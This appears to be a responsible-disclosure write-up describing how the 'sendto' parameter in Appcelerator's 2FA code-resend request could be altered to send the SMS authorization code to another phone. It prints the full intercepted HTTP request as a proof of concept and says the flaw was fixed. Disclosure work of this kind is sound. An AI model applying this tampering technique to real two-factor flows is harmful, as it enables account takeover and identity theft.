Weakness:Web Parameter Tampering
Two Factor Authentication, also known as 2FA is an extra layer of security that is known as “multi factor authentication” that requires not only a password and username but also something that only, and only, that user has on them,Using a Two Factor Authentication process can help to lower the number of cases of identity theft on the Internet, as well as phishing via email, because the criminal would need more than just the users name and password details.
If 2FA is enabled in Appcelerator account we need to verify device authorization code after logged in, using email address and password in order to access that account, the authorization code can be received from either registered email address or phone number
After logged into my account, I selected SMS option to receive authorization code and intercepted the request using Burp Proxy
REQEST:
POST /api/v1/auth/deviceauth/resend?_=1468379493167 HTTP/1.1 Host:platform.appcelerator.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: application/json; charset=utf- 8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With:XMLHttpRequest
Referer: https://platform.appcelerator.com/ Content-Length: 89 Cookie:connect.sid=s%3AuaT30j6RosUYLUwCMIFsW10jzxIDLRN8.mVIeYgdbfu8PhbkILdy07yWEAiZZ4GUv4%2B5qpo%2BpaRQ;aid=653cf33a8dbd00dbc2c431935fc281a8c80b3baa3642dcca;aidsid=76c8766c427b466a7bd110a391e64a684ce74192; _ga=GA1.2.1540821944.1468379453; _gat=1; dvid=5e5bafae-b83e-41c1-9c2f-d154b24d8e69
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
user_guid=0f402223-54a8-4b66-91b4- 300af56d9c46&from=web&sendby=sms&sendto=%2B919061100000The parameter “sendto” is vulnerable to Web Parameter Tampering Attack that means we can change the phone number in that request and the authorization code will send to that number hence attacker will get the authorization code
After reporting this issue, Appcelerator resolved the vulnerability and listed my name on their Hall Of Fame page
http://www.appcelerator.com/privacy/responsible-disclosure-of-security-vulnerabilities/
